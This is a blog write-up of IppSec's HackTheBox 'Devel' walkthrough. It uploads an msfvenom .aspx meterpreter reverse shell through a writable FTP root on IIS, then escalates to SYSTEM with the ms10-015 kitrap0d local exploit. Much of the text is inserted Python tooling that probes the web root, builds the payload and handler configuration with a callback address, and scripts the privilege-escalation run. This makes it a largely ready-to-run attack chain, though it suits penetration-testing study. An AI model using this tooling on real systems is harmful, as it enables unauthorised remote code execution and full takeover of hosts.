Disassembly of IppSec’s YouTube video HackTheBox - Devel. A Windows box that is completed entirely within Metasploit, using the standard commands you would use to enumerate a box and interact with it. A great Metasploit refresher.
Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risks/responsibilities.
This series will contain comprehensive write-ups of HackTheBox machines, in an effort to sharpen reporting techniques and help solidify the understanding and methodologies used during penetration testing.
Enumeration
nmap scan:
(results)
FTP is open, which is interesting; HTTP is expected. FTP is the lead worth chasing, because write access to the web root would turn a plain file upload into code execution.
navigate to the web server
The default IIS start page is shown. Investigating the image file name, we see it is labeled “welcome.png”, which is a file name that was also enumerated from the FTP server.
checking out /iisstart.htm
which is the main index page:
Both file names appear in both places, so the HTTP server’s document root is most likely the same directory the FTP server exposes.
ftp to the open port
create a test file locally
“put” the file on the FTP server
file uploaded successfully to the FTP server.
viewing the uploaded file
When the file is requested through the web server, a file name without an extension gets a 404 error: IIS will not serve a static file whose extension has no MIME type mapping, so the request is rejected even though the file is on disk.
If the test file is renamed to test.html
a 200 response is returned.
upload
The request returns a 200 response and displays the contents of test.html, confirming that anything written to the FTP root is reachable through the web root.
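The FTP-root-equals-web-root check above, as an added example that is not code from the write-up or from IppSec: upload a marker file under a few names, fetch each one over HTTP, and classify the response. The probe logic takes its upload and fetch functions as parameters so it can be exercised without a live target; the live wrappers assume anonymous FTP login and HTTP on port 80, neither of which the page states outright. The marker carries a random token so a pre-existing file with the same name is never mistaken for ours.

```python
"""Added example (not from the original write-up): confirm that the FTP root
is the IIS web root by uploading a marker file and fetching it over HTTP.

Assumptions not stated on the page: anonymous FTP login, HTTP on port 80.
"""
import ftplib
import io
import secrets
import urllib.error
import urllib.request

# Names to probe. The write-up observes: no extension -> 404, .html -> 200.
CANDIDATE_NAMES = ["probe", "probe.txt", "probe.html"]


def ftp_put(host, name, data, user="anonymous", password="anonymous@"):
    """Upload `data` as `name` into the FTP root (assumes anonymous login)."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login(user, password)
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def ftp_delete(host, name, user="anonymous", password="anonymous@"):
    """Remove a probe file again so nothing is left behind on the target."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login(user, password)
        ftp.delete(name)


def http_get(host, name):
    """Return (status, body) for http://host/name; 4xx/5xx are returned, not raised."""
    try:
        with urllib.request.urlopen(f"http://{host}/{name}", timeout=10) as r:
            return r.status, r.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def probe_webroot(names, put, get, token=None):
    """Upload each name via put(name, data), fetch via get(name) -> (status, body).

    Returns {name: verdict}: 'served' (200 and our token came back),
    'served-different-content' (200 but not our file) or 'HTTP <status>'.
    The callables are injected so the logic runs offline against fakes.
    """
    token = token or secrets.token_hex(16)
    marker = f"webroot-probe {token}".encode()
    results = {}
    for name in names:
        put(name, marker)
        status, body = get(name)
        if status == 200 and token.encode() in body:
            results[name] = "served"
        elif status == 200:
            results[name] = "served-different-content"
        else:
            results[name] = f"HTTP {status}"
    return results


def webroot_overlaps(results):
    """True if at least one uploaded file was served back with our token."""
    return any(v == "served" for v in results.values())


if __name__ == "__main__":
    import sys
    host = sys.argv[1]  # target IP, e.g. the box's address
    res = probe_webroot(
        CANDIDATE_NAMES,
        put=lambda n, d: ftp_put(host, n, d),
        get=lambda n: http_get(host, n),
    )
    for name, verdict in res.items():
        print(f"{name:12} {verdict}")
        ftp_delete(host, name)  # clean up after ourselves
    print("FTP root == web root:", webroot_overlaps(res))
```

Run it as `python probe.py <target-ip>`; a single "served" verdict is enough to justify uploading an executable extension next, and the extensionless name documents the 404 behaviour the write-up saw.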
Burp Suite
Keep in mind that IIS executes server-side code for the .asp and .aspx file extensions, so an upload with one of those extensions is not just a static file.
intercept the request with Burp
send the intercepted request to Repeater (Ctrl+R)
The web server reports IIS 7.5, which ships with Windows 7 and Windows Server 2008 R2. Thought process: *.asp* is classic ASP, scripted in VBScript, while .aspx is ASP.NET, built on the .NET Framework, which is the more likely of the two to be enabled in this case.
msfvenom
flags that will be used: -p = payload, -f = format, -o = output
list msfvenom payloads
Be cognizant of the payload type chosen: 32-bit and 64-bit payloads are not interchangeable, so the payload architecture has to match the process that will run it.
list msfvenom formats
setup payload
This created an aspx file that will load meterpreter.
viewing the file created:
referred to as the magic!
upload payload
on the FTP server
load msfconsole and the listener
set payload:
set LHOST to the local IP address
recreating the payload with host/port
The payload was first created without LHOST and LPORT, so the .aspx would not call back to the handler; it is regenerated with the listener’s address and port.
re-upload to the FTP server
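The payload and listener steps above share one failure mode, which the write-up hits: the address and port baked into the .aspx and the ones the handler listens on are set in two places and drift apart. As an added example (not code from the write-up or from IppSec), the snippet below derives the msfvenom command and a multi/handler resource file from a single Callback, and includes a small parser that checks any argv/rc pair for that mismatch. LHOST 10.10.14.5, LPORT 4444 and the output name shell.aspx are assumed values the page does not give; windows/meterpreter/reverse_tcp is the 32-bit meterpreter the write-up uses, and windows/x64/meterpreter/reverse_tcp would be its 64-bit counterpart.

```python
"""Added example, not from the original write-up: one source of truth for
the callback address used by msfvenom and by exploit/multi/handler.

Assumed values (not on the page): LHOST 10.10.14.5, LPORT 4444, shell.aspx.
"""
import subprocess
from dataclasses import dataclass


@dataclass(frozen=True)
class Callback:
    lhost: str
    lport: int
    payload: str = "windows/meterpreter/reverse_tcp"  # x86 staged meterpreter
    fmt: str = "aspx"
    out: str = "shell.aspx"

    def msfvenom_argv(self):
        """-p payload, -f format, -o output, with LHOST/LPORT as KEY=VALUE."""
        return ["msfvenom", "-p", self.payload,
                f"LHOST={self.lhost}", f"LPORT={self.lport}",
                "-f", self.fmt, "-o", self.out]

    def handler_rc(self):
        """Resource file for `msfconsole -q -r handler.rc`; -j backgrounds the job."""
        return "\n".join([
            "use exploit/multi/handler",
            f"set payload {self.payload}",
            f"set LHOST {self.lhost}",
            f"set LPORT {self.lport}",
            "set ExitOnSession false",
            "exploit -j",
            "",
        ])


def callback_from_argv(argv):
    """(LHOST, LPORT) parsed from the KEY=VALUE tokens of an msfvenom command."""
    opts = dict(tok.split("=", 1) for tok in argv if "=" in tok)
    port = int(opts["LPORT"]) if "LPORT" in opts else None
    return opts.get("LHOST"), port


def callback_from_rc(rc_text):
    """(LHOST, LPORT) parsed from `set LHOST ...` / `set LPORT ...` lines."""
    opts = {}
    for line in rc_text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0].lower() == "set":
            opts[parts[1].upper()] = parts[2]
    port = int(opts["LPORT"]) if "LPORT" in opts else None
    return opts.get("LHOST"), port


def mismatch(argv, rc_text):
    """True when the payload would call back somewhere the handler is not listening."""
    return callback_from_argv(argv) != callback_from_rc(rc_text)


def build(cb, rc_path="handler.rc"):
    """Generate the .aspx with msfvenom and write the matching handler rc."""
    subprocess.run(cb.msfvenom_argv(), check=True)
    with open(rc_path, "w") as fh:
        fh.write(cb.handler_rc())
    return rc_path


if __name__ == "__main__":
    cb = Callback(lhost="10.10.14.5", lport=4444)  # assumed attacker IP and port
    rc = build(cb)
    assert not mismatch(cb.msfvenom_argv(), cb.handler_rc())
    print(f"upload {cb.out} to the FTP root, then: msfconsole -q -r {rc}")
```

The parser is deliberately tolerant of an argv with no LHOST/LPORT at all, because that is exactly the first version of the payload the write-up generated; such an argv always reports a mismatch against a configured handler.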
navigate to the payload
response:
a meterpreter session was created.
Metasploit interaction with the shell
To interact with the shell
first step:
check the architecture, which is x86
Normally this would list the hotfixes installed, but in this case it says N/A, which could mean this machine has never been updated. Keep in mind the boot time and the Service Pack as well.
metasploit exploit suggester
background the current shell and search for suggester
use local_exploit_suggester
set SESSION to the current session:
Since this box has not been updated since release, and the OS it reports was released in 2009, any of the returned exploits might work.
Choosing the first exploit, ms10-015 kitrap0d
Since we didn’t set a payload, Metasploit opted to use *windows/meterpreter/reverse_tcp*
whose LHOST and LPORT were not configured correctly for our listener.
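The privilege escalation step above fails for the same reason the first payload did: the local exploit was run with a default payload whose LHOST/LPORT were never set. As an added example that is not code from the write-up or from IppSec, the snippet below reads local_exploit_suggester output, ranks the modules whose check actually validated ahead of those that merely could not be ruled out, and emits an msfconsole resource file that pins payload, LHOST, LPORT and SESSION before running the module. SAMPLE_OUTPUT is constructed to mirror the suggester's line format; the module names are real Metasploit modules but the target IP and the verdicts are made up. LHOST 10.10.14.5 and LPORT 4445 are assumed values, and the port intentionally differs from the first-stage handler, which still owns its port if it was started as a background job.

```python
"""Added example, not from the original write-up: choose a local exploit from
local_exploit_suggester output and pin every option before running it.

SAMPLE_OUTPUT is constructed (verdicts and IP are made up); LHOST/LPORT are
assumed values.
"""
import re

SAMPLE_OUTPUT = """\
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 34 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target appears to be vulnerable.
[-] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target is not exploitable.
"""

# Only [+] lines name a candidate; group 1 is the module path, group 2 the verdict.
LINE = re.compile(r"^\[\+\] \S+ - (exploit/\S+): (.*)$")


def parse_suggestions(text):
    """Return [(module, validated)] for every [+] line, validated ones first.

    'validated' means the check said 'appears to be vulnerable' rather than
    the weaker 'could not be validated'. Original order is kept otherwise.
    """
    found = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            module, verdict = m.group(1), m.group(2)
            found.append((module, "appears to be vulnerable" in verdict))
    return sorted(found, key=lambda mv: not mv[1])  # stable: validated first


def privesc_rc(module, session, lhost, lport,
               payload="windows/meterpreter/reverse_tcp"):
    """Resource file that runs `module` against `session` with every option pinned."""
    return "\n".join([
        f"use {module}",
        f"set SESSION {session}",
        f"set payload {payload}",  # x86 meterpreter; kitrap0d targets 32-bit sessions
        f"set LHOST {lhost}",
        f"set LPORT {lport}",      # not the first-stage handler's port
        "exploit",
        "",
    ])


def rc_is_pinned(rc_text):
    """True when payload, LHOST, LPORT and SESSION are all set before `exploit`."""
    lines = rc_text.splitlines()
    if "exploit" not in lines:
        return False
    before_run = lines[: lines.index("exploit")]
    keys = {l.split()[1].upper() for l in before_run if l.startswith("set ")}
    return {"PAYLOAD", "LHOST", "LPORT", "SESSION"} <= keys


if __name__ == "__main__":
    ranked = parse_suggestions(SAMPLE_OUTPUT)
    module = ranked[0][0]
    rc = privesc_rc(module, session=1, lhost="10.10.14.5", lport=4445)
    assert rc_is_pinned(rc)
    print(rc)  # save as privesc.rc and load in msfconsole with: resource privesc.rc
```

Feed it the real suggester output (for example from `spool`) instead of SAMPLE_OUTPUT; the ranking is only a hint, and a "could not be validated" module such as the one the write-up chose is still worth trying when the box is as unpatched as this one.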
An error occurred and the box crashed, so he redid all the steps to this point and re-ran the exploit.
connect to the shell
operating as NT AUTHORITY\SYSTEM!
#HAILippsec
If you don’t know who IppSec is, check him out at:
Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec